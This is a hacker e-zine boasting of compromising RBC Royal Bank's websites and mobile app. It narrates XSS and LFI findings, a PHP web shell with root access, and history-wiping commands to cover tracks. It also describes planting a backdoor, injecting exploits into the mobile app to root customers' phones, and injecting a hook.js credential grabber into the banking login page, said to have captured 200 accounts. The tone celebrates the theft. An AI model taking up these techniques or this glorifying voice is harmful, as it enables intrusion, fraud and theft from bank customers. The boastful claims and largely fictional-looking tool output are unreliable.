_________
| _ _ |
.--.|_/ | | \_|_ .--.
/ .'`\ \ | | [ '/'`\ \
| \__. | _| |_ | \__/ |
'.__.' |_____| | ;.__/
[__|
#owntheplanet
@hackthearmy
don@otp:~$ ./dir.sh
listing dir…
[1.] introduction
[2.] web app vulnerabilities
[3.] web shell and pseudo terminal shell you say?
[4.] ./ripmobile.sh (mobile.rbcroyalbank.com)
___________________________________________________________________
[introduction] :
Congrats, you have stumbled upon something that probably no reporter and no security analyst will come across during their research, because they drown themselves in the google-dorking e-zines they find in the common grounds of the internet and don't bother searching the less known, yet easy to find, e-zines. Today, I will discuss how my dog and I owned every system the RBC Royal Bank has.
___________________________________________________________________
[web app vulnerabilities]
After managing to find an XSS in the domain and an LFI in the domain, I decided to just use the LFI to my advantage and see if I could upload a shell to the domain. (Next time you are securing your domain, put restrictions on what type of file extensions users who don't have root can upload. Sincerely, ~otp)
XSS(main domain) ~~~~~~~~ https://i.imgur.com/0SPCraV.png
LFI(main domain) ~~~~~~~~ https://i.imgur.com/atyEC3n.png
___________________________________________________________________
[web shell and pseudo terminal shell you say?]
I uploaded a .php shell to their domain and decided to have some fun with uid=0(root) on all their domains, with a special focus on one domain: the mobile app they used, which was hosted at mobile.rbcroyalbank.com and through which all client info would pass. So, I decided to begin using my favorite shell, the 404 pseudo terminal shell, which would allow me to execute malware on the app and list all the files and domains comfortably from my terminal.
Webshell(main domain) ~~~~~~~ https://i.imgur.com/IX4i3jv.png
>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>
don@otp:~$ ./404.sh -t http://www.rbcroyalbank.com/REDACTED-REDACTED/REDACTED-REDACTED-REDACTED/REDACTED/REDACTED-REDACTED/REDACTED.php
connection to target (SSL)…
connection complete.
running pseudo terminal session…
____
,M 6MMMMb ,M
,dM 6M' `Mb ,dM
,dMM MM MM ,dMM
,d MM MM MM ,d MM
,d MM MM MM ,d MM
,d MM YM. ,M9 ,d MM
MMMMMMMM YMMMM9 MMMMMMMM
MM MM
MM MM
MM MM .sh
coded by les miserables, educational purposes only.
404@rbcroyalbank.com:~$ use /tools/list/dirs.sh --root
/
_assets-custom/
credit-cards/
international-money-transfer/
personal-loans/
savingsspot/
uos/
customer-service/
investing/
usbanking/
mobile/
products/
visagiftcard/
cgi-bin/
includes/
myfinancetracker/
resp/
tfsa/
online/
travelinsurance/
404@rbcroyalbank.com:~$ rm -f .bash_history
404@rbcroyalbank.com:~$ rm -f .sh_history
404@rbcroyalbank.com:~$ rm -f .mysql_history
404@rbcroyalbank.com:~$ use /tools/backdoors/REDACTED-REDACTED.sh -REDACTED -set /REDACTED/REDACTED/REDACTED
404@rbcroyalbank.com:~$
___________________________________________________________________
[.ripmobile.sh (mobile.rbcroyalbank.com)]
After archiving all of their client bank account information, credit cards, and web banking logins (username / pass), I decided, just for the fun of it, to use every exploit that's public for gaining access to iOS, Windows Phone, BlackBerry, and Android devices and inject it into their app for mobile devices. The only words I have to say regarding this are: oh boy, because this was the funniest thing I have done in a while, pulling off a Linux Mint hack (amirite Yevgeniy N) and exploiting all these phones. Turns out I couldn't force the application to update automatically, so I rooted a small portion of devices before I rm -f'd the malware off the app. I have mercy, yes, I am a disgrace, hah. I decided then to use the phones that I rooted and have fun with them.
>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>
don@otp:~$ ./ripmobile.sh (mobile.rbcroyalbank.com) --root (who) -update
Antoine's_Iphone5:3333:uid=0(root) gid=0(root) groups=0(root)
Alices_Ipadmini:3333:uid=0(root) gid=0(root) groups=0(root)
Juliettes_Iphone:3333:uid=0(root) gid=0(root) groups=0(root)
HanahsAndroidphone:3333:uid=0(root) gid=0(root) groups=0(root)
don@otp:~$ ./ripmobile.sh (mobile.rbcroyalbank.com) -root HanahsAndroidphone:3333
rip@mobile:~/HanahsAndroidphone$ use /wifi/bluetooth/listen.sh
loading…
{"wifi":"on","bluetooth":"on","bluetoothLowEnergy":"100","cellular":"100"}
listening on port:3333 …
exiting…
saved under /ripmobile/root/victims/HanahsAndroidphone/listen.log
don@otp:~$
___________________________________________________________________
[itzy bitzy spider]
After messing with the mobile application, and barely touching the domain (besides archiving their entire database), and since people used the web banking more than the application, I decided to inject the web banking login pages with hook.js. I logged back into the 404 shell I placed earlier and decided to begin using my script to inject their web banking page.
>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>
404@rbcroyalbank.com:~$ ./itzybitsy.pl -i -ext "js" -d /REDACTED/hook.js -t (https://www1.royalbank.com/cgi-bin/rbaccess/rbunxcgi?F6=1&F7=IB&F21=IB&F22=IB&REQUEST=ClientSignin&LANGUAGE=ENGLISH)
[14:38:43][*] connecting to www1.royalbank.com/cgi-bin/rbaccess/rbunxcgi?F6=1&F7=IB&F21=IB&F22=IB&REQUEST=ClientSignin&LANGUAGE=ENGLISH …
[14:38:43][*] connected.
[14:38:43] | injecting hook.js …
[14:38:43] | configuring webpanel…
[14:38:43] | configuring pseudoterminal panel…
[14:38:43][*] user : REDACTED
[14:38:44][*] password : REDACTED
[14:38:49][INFO] IF YOU ENTER THE INCORRECT 4+ TIMES PANEL WILL SELF-RM.
[14:38:49][*] Modules loaded.
[14:38:49][*] spider is up and running!
[14:38:49][+] running on network interface: REDACTED
[14:38:49] | Hook URL: REDACTED
[14:38:49] |_ UI URL: REDACTED
[14:38:49][+] running on network interface: REDACTED
[14:38:49] | Hook URL: REDACTED/hook.js
[14:38:49] |_ UI URL: REDACTED
[14:38:49][*] Spider server running, [CONTROL-C] to exit.
>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>>.>.>
After injecting the web banking with a browser hook, user and password grabber,
I went to go get coffee, yes this is part of the zine, shut up.
I logged the IPs, bank account username and password of each account that passed through the 30 minute set.
(200 accounts logged)
IPs logged ~~~~~ https://i.imgur.com/MOE9Abl.png
___________________________________________________________________
[outro]
Thanks for reading my e-zine, hope you enjoyed stupid foreign banks getting FuKin OwNed. Follow my twitter @fuckinterpol for more, and remember, #OwNtHePlaNeT -don corelone